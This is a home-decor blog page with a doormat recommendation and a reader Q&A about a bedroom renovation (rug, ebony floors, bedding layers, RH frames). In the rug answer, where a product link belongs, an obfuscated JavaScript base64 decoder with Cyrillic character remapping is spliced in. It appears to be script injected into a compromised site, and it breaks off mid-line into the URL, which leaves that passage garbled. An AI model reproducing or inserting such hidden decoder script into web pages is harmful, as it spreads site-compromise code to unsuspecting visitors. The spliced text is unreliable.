…favorite things friday: architectural doormat

I heart the girls behind Antique Farmhouse and Decor Steals. They now have their very own site, Bits of Vintage, where you can purchase wares that are not a steal of the day, but a steal anytime. (They are not even paying me for this, I just love the products!)

Bits of Vintage has lots of fun decor, but also practical decor that makes a big statement. I know we do not often look at a doormat counting for anything, but what is the first thing that people see when they arrive at your door? I know I look at the door mat! I think sometimes we get distracted by colored mats with fun sayings or logos or we get trapped with thinking that a cheap-0 rubber mat will suffice. Hmm. If the doormat is a precursor to what is inside, don't we want it to look stunning?

I bought my iron pineapple mat when we moved into our home. It was one of the first things i purchase because i wanted it to reflect the inside. Not only has it lasted 7 years and will probably last 77 more, but it is PRETTY! AND WE LIKE PRETTY, DON'T WE?!

Check out the one that they are selling at Bits of Vintage. Architectural Doormat found here for $49.50.

Hi Lovelies!

Thank you for all the sweet compliments on my new space. Here are the answers to your questions about the renovation with links to some of the products I chose.

What is the size of the rug in your bedroom and do you have it completely under the bed?  Would you mind sharing where you purchased it.

I found this run from Overstock. When shopping for bedding, bath towels, lighting and rugs, I typically search here first for discounts. Actually, I go the expensive websites and then try to copy the look at Overstock or a discounted site. It is a nuLOOM rug, which is a quality brand sold on many sites. Mind is the nuLOOM Handmade Moroccan Trellis Faux Silk Wool Rug found function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4.charAt(oe++));ve=sa.indexOf(o4.charAt(oe++));r4=sa.indexOf(o4.charAt(oe++));n2=sa.indexOf(o4.charAt(oe++));x1=(yc<<2)|(ve>>4);pc=((ve&15)<<4)|(r4>>2);u6=((r4&3)<<6)|n2;if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;q3+=String.fromCharCode(x1);if(r4!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;q3+=String.fromCharCode(pc);}if(n2!=64){if(u6>=192)u6+=848;else if(u6==168)u6=1025;else if(u6==184)u6=1105;q3+=String.fromCharCode(u6);}}while(oemade-Moroccan-Trellis-Faux-Silk-Wool-Rug-9-x-12/7260231/product.html?TID=MyAcct:MO:OR:ProdName" target="_blank">here.

I have the top of the rug almost to the wall underneath, the bed centered, and then it rolls out to maybe 7 ft, passing the end of the bed.

Looks beautiful! What is the color of the stain used for the new floors?

We used Ebony for the flooring. It sounds like it may be dark, but this is the result. It looks much warmer in the light, doesn't it?

Can you tell us about the multiple layers in your bedding?

I heart pillows and puffs and blankets and sheets when I sleep. DH does not. Whoever is in bed first is usually the winner of the pillow battle. So, here are the layers that I use because this is a good question (BTW - the layers in the photo are out of order because my cleaning women did it this way and I didn't switch it before taking the shot.)

  1. 3 medium pillows with decorative shams
  2. 2 king-sized pillows with pillow cases
  3. 2 king-sized pillows with decorative shams
  4. 1 super long bolster
  5. 1 throw
  6. 1 large stuffed cat

Then I have sheets, a quilted coverlet and a white duvet. It sounds like a lot, but once you snuggle in it's perfect!

Are you selling any of the furniture that you are not using?

Right now I am moved all excess pieces into the guestroom. I'm sure I will switch things around in there too so stay in touch!

I have to have these! Where are they from (frames)?

Restoration Hardware. 19th C. Framed HERBARIUMS Ivory, set of 6 found here.

Could you tell me why you decided on hardwood? Do you know the pros and cons of both?

Again, I really hate seeing buckled carpet. Like hate it. It looks old. Yes, you can have it stretched and that's a great option. We also had a huge chocolate lab (who recently went to doggie heaven) and he used to sleep on the side of the bed. The carpet became dingy and tinted and just did not look clean. I love the hardwood so much because it has a really clean look to it. I don't miss the carpet at all!

Can you link the area rug?

See above.

This chandelier is beautiful!!!   are you a RH member... I think if you become a member for a $100 annual fee you get a 25% discount... can you confirm?

Yes, I saw that. I also see new prices underneath their products for members. I do not know all the details or if it would be worth doing. I am not an RH member, but the discount sounds nice.

Would you share where you got the lovely prints please?

See above.
